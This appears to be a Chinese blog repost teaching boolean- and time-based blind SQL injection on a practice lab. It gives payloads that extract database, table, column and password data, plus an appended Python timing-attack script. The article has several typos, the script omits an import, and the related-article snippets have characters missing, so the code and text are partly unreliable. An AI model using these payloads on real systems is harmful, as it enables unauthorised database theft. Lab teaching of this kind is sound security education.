SQL基于时间的盲注过程

最新推荐文章于 2025-06-12 08:10:00 发布
最新推荐文章于 2025-06-12 08:10:00 发布
阅读量307 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库
原文链接:http://www.cnblogs.com/ldhbetter/p/9201840.html

0x00 前言

由于要使用到基于时间的盲注,但是我觉得基于时间的盲注其实就是基于布尔的盲注的升级版,所以我想顺便把基于布尔的盲注分析总结了;

首先我觉得基于时间的盲注和基于布尔的盲注的最直观的差别就是“参照物”不同,也就是说基于布尔的盲注,其实是可以通过页面的一些变化来进行判断结果!但是有的时候,执行一些sql语句的测试,页面不会有像布尔盲注的时候比较直观的变化,所以这个时候所谓的基于时间的盲注,也就是在基于布尔的盲注上结合if判断和sleep()函数来得到一个时间上的变换延迟的参照,也就可以让我们进行一些判断。

0x01 获取数据库名的长度

-构造的sql语句:1’ and (length(database()))> 5#
-分析:因为and后面的表达式运算的结果是bool,保证and前面的结果为真的前提下,就可以通过后面的表达式返回的bool结果来判断猜测是否正确database()这个函数的作用是获取当前的数据库名,但是我们并不能看到,所以需要通过length()函数去获取这个数据库名字的长度,通过这个长度去和我们指定的一个数比较,那么只要最后的结果为真,那就可以得到数据库名字的长度

0x02 获取数据库名字

-得到数据库名的长度过后,那就可以继续去得到数据库的具体名字,同样也是通过bool结果去判断

-构造的sql语句: 1‘ and (ascii(substr(database(),n,1)))>m #

 

分析:得到了数据库名字的具体长度,database()可以获得数据库的名字(只是无法看到),那就可以通过database()函数获得数据库名字过后,再通过substr()函数去处理这个数据库名字字符串substr(database(),n,1) 第一个参数是数据库名字,第二个参数是开始截取的字符的位置(从1开始计算),最后一个参数是截取的字符的长度。由于是想要通过bool去判断这个截取出来的具体字符是什么,所以还需要将截取出来的字符使用ascii()函数将字符转换为ascii编码的数值,然后再通过这个数据去和一个数比较,通过分别改变截取的起始位置和后面对比的数字,最后就可以把具体的数据库名字猜解出来

0x03 获取表的数量

-得到数据库表明过后,接下来就可以去获取我们查找到的数据库的表的数量

 

-构造的sql语句:1' and (select count(*) from information_schema.tables where table_schem=database())>5#

 

分析:同样也是通过最后的bool结果的真假来得到表明的数量

select count(*) from information_schema.tables where table_schem=database()

这条sql语句的作用就是从数据库information_tables里面的tables表找到table_schem字段为database()的记录的总数,也就是可以通过这个语句得到database()这个数据库里面的表的总数,因为information_schema这个数据库里面存放了所有mysql数据库服务器的相关信息,这个数据库里面的tables表里面就是存放的数据库管理系统中所有数据库的表的信息。最后得到表的数量过后,就使用这个数量结果去和一个数进行比较,那么通过对这个比较的数进行改变,就可以猜解出来这个数据库的表的数量是多少;可以通过二分法的方式进行查找

0x04 获取表名长度

-构造的sql语句:

1’ and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>5#

分析:由于一个数据库 里面创建了许多张表,所以我们需要利用limit 0,1这个命令相结合,每次只取一个表去做计算,对于其他的表以此类推;

0x05 获取表名字

-得到表名的长度过后,,就需要利用asscii()函数去得到表名的每一个字符的ascii嘛,从而得到我们想要的表名

构造的sql语句:1‘ and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),0,1)))>100

 

分析:从information_schema的tables表中的table_schema字段等于database()的所有记录中取出第一行记录的 table_name字段的值;

然后利用取出的这个值使用substr()函数分别得到表名的每个字符,然后再通过ascii()去计算这个ascii码,由于我们看不见这个ascii码是多少,由于我们能够知道布尔结果,所以就用这个计算出的ascii码去和一个数进行比较,从而可以判断出具体的ascii码是多少,也就知道了对应的字符是什么。从而猜解出数据库的表名

0x06 获取列名个数,列名长度,列名

-得到数据库的表名过后,那下一步我们就想获得对应表名的列名,也就是字段名字,那么这个时候我们就需要到information_schema数据库里的columns表里面去查询所有的表的列名相关的信息,那么获取列名的步骤也和前面的原理一样,先猜解列名的个数,获取列名的长度,然后通过获得的长度再去猜解列名

构造的sql语句:

1’ and (select count(*)from information_schema.columns where table_name=‘user’)>5#

 

构造的sql语句:

1’ and (select length(column_name)from information_schema.columns where table_name=‘user’ limit 0,1)>5#

 

构造的sql语句:

1’ and (ascii(substr((seclect columns_name from information_schema.columns where table_name='user' limit 0,1),1,1)))>100#

0x07 获取数据

-获取数据,原理同前面一样
构造的sql语句:1‘ and (ascii(substr(( select password from users limit 0,1),1,1)))=68#

0x08 基于时间盲注的要点

通过对上面的分析,我认为使用基于时间的盲注的时候,就可以将上面的构造的sql语句进行这样的变化,如下:

and if((length(database())>5),sleep(5),0)

其实也就是通过length(database())>5 返回的布尔值,然后造成时间上的延迟来判断结果,如果数据名的长度大于5是成立的,那么sleep(5)这个函数就会起作用,能够让我们感觉到返回一个页面的时间上发生了变化,通过这个变化我们就能知道我们的判断对不对。

0x09 实战演练

1通过参数提交,无论怎样的参数,页面都不发生任何变化,都是同一个页面

 

 

 

2、由于页面没有发生任何变化,无法做出有效判断,所以试试基于时间的盲注

构造的语句:2' and if(1=1,sleep(5),0)--+

 

 

 

通过前后对比,可以断定是存在sql注入的,因为时间上的变化可以确定我们构造的sql语句被带入了数据库执行,只是我们无法直观的看到,只能通过sleep函数来对时间上的变化造成影响,以作为我们的参照点,判断出我们想要的结果。

 

2、根据前面对布尔型注入和时间盲注的共同点分析,接下俩开始构造sql语句来猜解数据库名字的长度和名字

构造的sql语句:2' and if((length(database())>5),sleep(5),0)--+

判断数据库的名字是不是大于5.如果大于5,就执行sleep函数,通过查看时间知道sleep是否执行,如果被执行,那么继续改变5这个值,直到不再执行sleep

 

当我改到7的时候:

 

 

 

当我改到8的时候:

 

 

 

通过对比发现,当7的时候条件成立,8的时候条件不成立,也就是说数据库的长度是大于7不大于8,那长度又只能是整数,所以最后我们就成功的判断出当前的数据库的长度就是8

那我们可以将>8换成=8来验证一下:

2' and if((length(database())=8,sleep(5),0)--+

 

 

 

3、既然数据库名字的长度猜解出来了,下一步就同样使用时间盲注的方式来猜解数据库的名字

构造的sql语句如下:

2' and if(((ascii(substr(database(),m,1)))>n),sleep(5),0)--+

那么这句参数里的m,n这两个地方就是我们进行盲注的时候需要改变它们的值来测试的

m代表的是从数据库名字这个字符串的第一位开始,m变化的范围就是我们前面一部得到的数据库长度的大小:8;

n’代表的就是我们需要用来对比我们截取的字符的ascii码值的一个参考值,通过这个值的变化来最终确定我们截取的字符的ascii码值是多少,从而得到数据库名字的第一个字符

具体的操作如下:

100时:执行sleep

 

 

 

110时:执行sleep

 

 

115时:没执行sleep

 

 

进一步确定范围,数据库名的第一个字符的ascii码值的范围在110-115之间

那么继续更改;

112、113、114时:执行sleep

 

 

 

所以最后就很容易得到结果是:115,所以其对应的字符为:s

 

4、那么对于这个数据库名字的其他字符,也是通过这个方法一步步去猜解,最后就得到了我们想要的数据库名

结果是:security

通过我的数据库去验证一下,发现数据库里面确实有一个名字叫做security的数据库

 

 

那么对于表的数量,表名字的长度,以及列的相关内容和数据的相关内容,根据我前面的总结都可以使用类似的方式去推理得到,只是有点繁琐

关于今天的盲注的学习就到此结束!

转载于:https://www.cnblogs.com/ldhbetter/p/9201840.html

dda6607
关注
《网络安全自学教程》- SQL入之时间原理+步骤+实战操作
wangyuxiang946的博客
05-21 1万+
这篇文章为大家解析时间的实现原理,结合实战案例讲解时间的操作步骤以及时间误差的判断
SQL入—(一)布尔
xiaoyang886_的博客
06-10 791
id=1' order by 1--+没变化 id=1' order by 2--+没变化 id=1' order by 3--+没变化?and (ascii(substr(database(),1,1)))=115--+ 返回正常,说明数据库名称第一位是 s。
12.SQL入-基于时间(base on time)
愿听风成曲
07-06 428
输入payload语句进行睡5秒中,通过开发这工具查看时间,如图所示,会在5秒钟后在执行,因此存在基于时间。做一个if语句进行判断,如果数据库的第一个字符等于a,则睡5秒钟在执行。boolian的类型还有返回信息的状态,但是基于时间就什么都没有返回信息。如图所示,不等于a,返回时间上则为2秒(本地环境问题存在2秒延迟,正常0秒)如图所示,正确存在时间上的延迟7秒,说明p猜对了数据库名称的第一个字符。因数据库第一个字符为p,我就直接公布正确的答案,就不一个一个测试;
SQL入-时间
WolvenSec的博客
06-03 2711
SQL时间(Time-based Blind SQL Injection),又叫延时入,是一种SQL入攻击技术,用于在无法直接获取查询结果或查看响应内容变化的情况下,通过引入时间延迟来推断数据库的信息;时间依赖于数据库执行查询时的时间延迟,通过观察响应时间的变化,攻击者可以推测出查询结果。这里以Sqli-Labs靶场的Less-9关卡为例子来阐述时间的具体思路:进入关卡首先构建参数id。
pikachu靶场通关笔记26 SQL入09-时间(base on time)
最新发布
mooyuan的网络安全博客
06-12 1199
本系列为通过《pikachu靶场通关笔记》的SQL入关卡(共10关)渗透集合,通过对时间(base on time)关卡源码的代码审计找到SQL入安全风险的真实原因,讲解时间(base on time)的原理并进行渗透实践,本文为SQL入09之时间(base on time)关卡的渗透部分。
SQL入——时间
heyingcheng的博客
03-07 1229
web页面只返回一个正常页面。利用,逐个猜解数据。但是前提是数据库会执行命令代码,只是不反馈页面信息。回顾:当页面有回显选择当页面没有回显但是有报错信息选择当页面既没有回显也没有报错,但是有页面真假值,选择没有回显,没有报错,没有页面真假值,选择。
mysql 时间_SQL基于时间过程
weixin_39886251的博客
01-27 521
0x00 前言由于要使用到基于时间,但是我觉得基于时间其实就是基于布尔的的升级版,所以我想顺便把基于布尔的分析总结了;首先我觉得基于时间基于布尔的的最直观的差别就是“参照物”不同,也就是说基于布尔的,其实是可以通过页面的一些变化来进行判断结果!但是有的时候,执行一些sql语句的测试,页面不会有像布尔的时候比较直观的变化,所以这个时候所谓的基于时间,也就...
mysql基于时间_基于时间SQL
weixin_39581739的博客
02-08 284
1 基于时间SQLSQL 代码之后, 存在以下两种情况:如果入的SQL代码不影响后台[ 数据库] 的正常功能执行, 那么Web 应用的页面显示正确( 原始页面) 。如果入的SQL 代码影响后台数据库的正常功能( 产生了SQL 入) , 但是此时Web 应用的页面依旧显示正常( 原因是Web 应用程序采取了“ 重定向" 或“ 屏蔽 ”措施)。产生一个疑问: 入的SQL 代码到底被后...
SQL入之时间
banliyaoguai的博客
05-20 657
就是在sql过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为。对于基于时间来说,我们构造语句中,包含了能否影响系统运行时间的函数,根据每次页面返回的时间,判断入的语句是否被成功执行。
SQL入-(布尔时间
热门推荐
LJH1999ZN的博客
02-10 1万+
一、什么是 就是在sql过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql入。 二、的分类 基于布尔类型的 基于时间类型的 三、利用
N13-sqli 基于时间
尐猴子君ii的博客
04-08 338
打开pikachu测试平台,sqli base on time 章节。 先输入一个’ 尝试一下,发现反馈不报错。 输入kobe,发现反馈信息不变 打开浏览器的开发者工具,控制台,选择网络 输入 kobe’ and Sleep(5) #,发现延迟5秒发送。 输入错误信息,发现Sleep语句不执行。 这样我们就可以写一个判断kobe’ and if((substr(database(),1,1...
SQL时间
JieDG的博客
05-20 1214
时间 时间代码存在sql入漏洞,然而页面既不会回显数据,也不会回显错误信息,语句执行后也不提示真假,我们不能通过页面的内容来判断。这里我们可以通过构造语句,通过页面响应的时长,来判断信息,这既是时间 时间常用函数 left(m,n) --从左向右截取字符串m返回其前n位 substr(m,1,1) --取字符串m的左边第一位起,1字长的字符串 ascii(m) --返回字符m的ASCII码 if(str1,str2,str3)--如果str1正确就执行str2,否则执行str3 sleep
SQL入——基于时间(九)
Gjqhs的博客
02-20 2457
本章目的 了解延时技术的运用场景及条件,熟悉length()、Substr()、ascii()、sleep()、 if()等函数的用法,掌握基于时间基本流程。 PS:面试回答不深问就回答延迟 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 (2)安装的应用软件:sqlmap 、Burpsuite 、FireFox浏览器及其插件Hackbar 、 等 (3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890 想机:A-SQLi-L
基于SQLI的SQL时间
qq_44060093的博客
08-27 456
第一步 判断入点与入类型 ?id=1’ and sleep(10) %23 对比没有使用sleep()函数时的状态如下: 下面基于时间进行数据库信息获取 第二步 获取数据库长度 id=1’ and if((length(database())=8),1,sleep(5)) %23 判断得数据库长度为8 第三步探测数据库其他信息 (1)判断数据库名 ?id=1’ and if(ascii(substr(database(),1,1)=115,1,sleep(5))–+ 数据库名的第一个字母为s
sql时间
mahao_1559的博客
07-24 783
数据库长度: 后台代码: select id, username,password from users where id = '$id' limit 0,1; 求数据库长度: 输入id:1' and if(length(database())>10,sleep(0),sleep(5)) %23 错误,反应时间长(5s); select id, username,password ...
基于布尔 基于时间sql
qq_41071646的博客
02-19 576
在上一博客 其实就已经讲到了  sql     但是上一节 主要是有回显  页面中 会有很多 提示的信息  但是在实战中  这些东西 其实都不怎么存在的  这里  其实又分了 两种情况  第一种 是基于 布尔  第二种 就是  基于时间的    这两种   其实 都比较  简单     先说  基于 布尔的吧  基于布尔的 :    其实这个很好理解  页面只会返回 0或1  我...
sql时间
04-01
### SQL 时间的原理 SQL时间是一种基于布尔逻辑的时间延迟攻击方法,通过观察目标数据库在执行特定查询后的响应时间差异来推断数据的存在与否。其核心在于向服务器发送带有条件语句的恶意输入,并触发数据库中的等待操作(如 `WAITFOR` 或 `SLEEP`),从而间接获取敏感信息。 #### 条件判断与时间延迟机制 当攻击者构建一个包含时间延迟函数的 SQL 查询时,如果条件成立,则会强制数据库暂停一段时间再返回结果;反之则立即返回。这种特性使得即使无法直接看到错误消息或页面变化,也可以依据响应时间推测出隐藏的数据[^2]。 例如,在以下示例中: ```sql '; IF (SELECT COUNT(username) FROM Users WHERE username = 'Administrator' AND SUBSTRING(password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'-- ``` 此代码片段尝试检测管理员密码的第一个字母是否大于字符 `'m'`。如果是的话,数据库将会延迟指定秒数 `{delay}` 后才给出回应[^1]。 --- ### 实现方法概述 为了成功实施一次时间攻击,通常需要经历以下几个方面的探索: #### 1. **确认环境支持** 不同的关系型数据库管理系统(RDBMS),比如 MySQL、PostgreSQL MSSQL 等,各自拥有独特的语法用于引入人为延时。因此首先要弄清楚后台运行的具体 RDBMS 类型及其版本号以便调整相应的 payload 构造策略[^3]。 对于 Microsoft SQL Server(MSSQL), 可采用如下形式制造固定毫秒级停顿效果: ```sql WAITFOR DELAY 'HH:mm:ss' ``` 而在针对 MariaDB/MySQL 的场景下可以运用内置过程 sleep() 函数达成相似目的 : ```sql SLEEP(seconds) ``` #### 2. **二分法查找具体数值** 一旦验证了某个字段确实可以通过时间差反馈信息之后,下一步就是精确提取该字段的实际内容。这往往借助于经典的二分查找算法完成——即不断缩小范围直至锁定确切字节值为止。 假设我们已经知道某条记录对应列存储的是字符串类型数据且总长度不超过N位(可通过前期试探得知),那么可以从第一位开始逐个解析每一位可能取值直到整个串被还原出来为止: - 首先设定初始区间 `[a,b]=[ASCII_MIN, ASCII_MAX]`; - 计算中间点 c=(a+b)/2; - 发送请求询问当前处理位置处实际字符编码是否小于等于c; - 如果得到肯定答复(a<=target_char<=c),更新右边界 b=c ; - 若不然(target_char>c),相应修改左端 a=c+1 . 重复上述步骤直至上下限重合唯一解出现即可结束本轮迭代进入下一个待定索引继续相同流程... --- ### 完整案例分析 下面提供了一个完整的 Python 脚本样例演示如何自动化地利用时间漏洞读取出远程主机上的用户名列表成员名称首字母情况作为教学用途展示,请意合法合规前提下方可实践演练! ```python import requests from string import ascii_lowercase url = "http://example.com/vulnerable_endpoint" true_delay = 5 # 秒 def check_condition(payload): """Send request with given payload and measure response time.""" start_time = time.time() res = requests.post(url, data={"input": payload}) elapsed = time.time() - start_time return elapsed >= true_delay for char in ascii_lowercase: test_payload = f"';IF((SELECT TOP 1 LEFT(name,1) FROM users)='{char}') WAITFOR DELAY '0:0:{true_delay}';--" if check_condition(test_payload): print(f"Found matching character: {char}") break ``` 以上脚本逐一试验英文字母表里的每一个小写字母看哪个能够引起预期之外延长加载现象发生进而得出结论说那个特殊符号正好匹配上了现存真实存在的那一位有效成分组成要素部分而已啦!当然这只是非常基础简单的示范仅供参考学习研究价值所在之处哈😊 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值